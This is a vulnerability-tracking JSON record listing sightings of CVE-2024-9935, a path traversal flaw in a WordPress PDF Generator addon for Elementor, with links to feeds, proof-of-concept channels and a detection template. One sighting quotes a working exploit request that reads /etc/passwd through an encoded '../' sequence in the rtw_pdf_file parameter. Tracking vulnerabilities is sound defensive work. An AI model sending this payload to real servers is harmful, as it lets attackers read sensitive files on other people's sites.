{"vulnerability": "cve-2024-9935", "sightings": [{"uuid": "a32e96a3-afa5-4f77-a8d7-5109be7a4ae0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-9935", "type": "seen", "source": "https://t.me/cvedetector/11206", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-9935 - Elementor Page Builder PDF Generator Path Traversal Vuln\", \n  \"Content\": \"CVE ID : CVE-2024-9935 \nPublished : Nov. 16, 2024, 4:15 a.m. | 38\u00a0minutes ago \nDescription : The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.5 via the rtw_pgaepb_dwnld_pdf() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"16 Nov 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-11-16T06:02:21.000000Z"}, {"uuid": "2b59b4f3-7f75-41e4-a2da-f15932d1b0b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-9935", "type": "published-proof-of-concept", "source": "https://t.me/DEVIL_La_RSx/869", "content": "", "creation_timestamp": "2024-11-22T20:19:32.000000Z"}, {"uuid": "8b1a3156-02f8-48c2-abab-0e1f61725bbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-9935", "type": "published-proof-of-concept", "source": "https://t.me/DEVIL_La_RSx/2433", "content": "\ud83d\udcc2 LFI Mass Hunting Explained | Directory Traversal POC &amp; CVE-2024-9935 for Bug Bounty", "creation_timestamp": "2024-12-06T14:18:24.000000Z"}, {"uuid": "13d5d345-0fd9-4e4f-be3c-166b6a5ef454", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-9935", "type": "published-proof-of-concept", "source": "https://t.me/DEVIL_La_RSx/2430", "content": "", "creation_timestamp": "2024-12-06T10:19:23.000000Z"}, {"uuid": "98bd4555-ade2-428b-95ed-b761f1c9116f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-9935", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113490730333560797", "content": "", "creation_timestamp": "2024-11-16T04:25:15.557243Z"}, {"uuid": "945d1c63-1725-4511-82d8-7685c50d8ad7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-9935", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2024/CVE-2024-9935.yaml", "content": "", "creation_timestamp": "2024-11-21T00:10:02.000000Z"}, {"uuid": "21a6f36e-f135-46c2-b991-36457f098fff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-9935", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3ldxfyf3j4s2m", "content": "", "creation_timestamp": "2024-12-23T07:31:42.597479Z"}, {"uuid": "77375fca-335a-4d84-872c-ac2292d2934e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-9935", "type": "seen", "source": "MISP/47454620-1c23-4125-9239-679bad601bf0", "content": "", "creation_timestamp": "2025-01-20T14:07:05.000000Z"}, {"uuid": "f5a31536-0b41-49bf-a1a8-46732eba8265", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-9935", "type": "published-proof-of-concept", "source": "https://t.me/xxexm/1676", "content": "\u062b\u063a\u0631\u0647 \u0641\u064a \u0627\u062d\u062f \u0627\u0636\u0627\u0641\u0627\u062a \u0648\u0631\u062f\u0628\u0631\u064a\u0633\n\u0631\u0642\u0645 \u0627\u0644 CVE\n\nCVE-2024-9935\n\n\u0627\u0644 exploit\n\nGET /elementor-84/?rtw_generate_pdf=true&amp;rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1\n\n#exploit #poc", "creation_timestamp": "2024-11-29T13:24:26.000000Z"}, {"uuid": "485d2fca-d721-46c6-80aa-e01d075b384e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-9935", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1642", "content": "", "creation_timestamp": "2024-12-06T08:52:28.000000Z"}, {"uuid": "f902de31-0cf0-4c78-9d27-95a5cf580f9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-9935", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1631", "content": "", "creation_timestamp": "2024-11-22T14:37:52.000000Z"}]}